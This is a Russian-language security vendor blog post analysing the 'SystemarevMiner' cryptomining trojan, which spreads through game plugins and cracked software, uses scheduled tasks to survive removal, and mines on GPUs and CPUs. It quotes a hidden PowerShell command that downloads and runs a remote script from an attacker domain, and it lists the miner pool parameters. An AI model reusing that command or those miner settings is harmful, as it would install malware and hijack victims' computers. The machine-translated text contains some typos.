Блог 360 Total Security

КриптоМайнер, SustemarevMiner, активно распространяется и может быть восстанавлен после удаления

В последнее время 360 центр безопасности обнаружил тип троян-КриптоМайнер, который активно распространяется. Этот троян скрывает Вредоносный скрипт для майнинга на некоторых запланированных задачах, чтобы избежать обнаружения антивирусного программного обеспечения. Более того, даже если троян уже обнаружен и удален, троян все еще может быть воскрешен, пока файл скрипта существует. Мы назвали его «SystemarevMiner».

Анализ

Троян установлен на компьютере пользователя через плагин игры и программные трещины. Отпустите следующие файлы после загрузки установочного пакета:
c: \ program files \ systemarev \ revservicesx \ app_loader.exe
c: \ program files \ systemarev \ revservicesx \ systemupdate64x.exe
C: \ Program Files \ Common Files \ restore_rev.bat

Создайте несколько запланированных задач и элементов запуска:


Файл restore_rev.bat настраивается как скрытое свойство и добавляется в запланированные задачи. Пакетный файл будет использовать Powershell для загрузки нового скрипт троян Powershell:
powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command «»iex ((new-object net.webclient) .DownloadString (‘http://77.super-me.online/files/restore_rev_inj.ps1’))»

Restore_rev_inj.ps1 загружается как скрипт powershell. Содержание показано ниже:

Через скрипт, файлы, которые загружаются приложениями:
amd64.exe — это приложение для майнинга, использующее графическую карту OpenCL AMD для выполнения крипто-майнина.
Параметр майнинга: «-B -no-color -r 50 -o 85.25.74.57:2228 -u x -p x -variant -1 -k -nicehash»

cud8.exe — это инструмент для майнинга, использующий графическую карту nvidia для выполнения крипто-майнина.
Параметр майнинга: «-B -no-color -r 50 -o 85.25.74.57:2229 -u x -p x -variant 1 -k -nicehash»

64.exe — это XMR / XMV, который использует cpu для крипто-майнинга
Параметр майнинга: «-auto -any -forever -variation 3 -o xmr-us-east1.nanopool.org:14444 -u [HASH] .jce2 / x @ x.com -p x»

Мы можем видеть доход:


Другой наиболее прибыльный пул майнинга:


Общий доход от пула этой учетной записи:


MServicesX.exe — это установочный пакет для трояна, предназначенный для восстановления первых трех файлов установки. Даже если файлы удалены, он все равно может быть восткрещен.

Напоминание

В последние дни мы обнаружили, что многие трояны-КриптоМанеры активно распространяются. Мы настоятельно рекомендуем пользователям включать антивирусное программное обеспечение при установке новых приложений. Пользователям также рекомендуется запускать проверку на вирусы с помощью 360 Total Security, чтобы не стать жертвой КриптоМайнеров.